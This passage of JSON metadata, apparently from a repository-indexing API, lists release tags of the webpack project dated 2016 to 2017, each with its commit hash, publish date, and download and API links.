:"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webp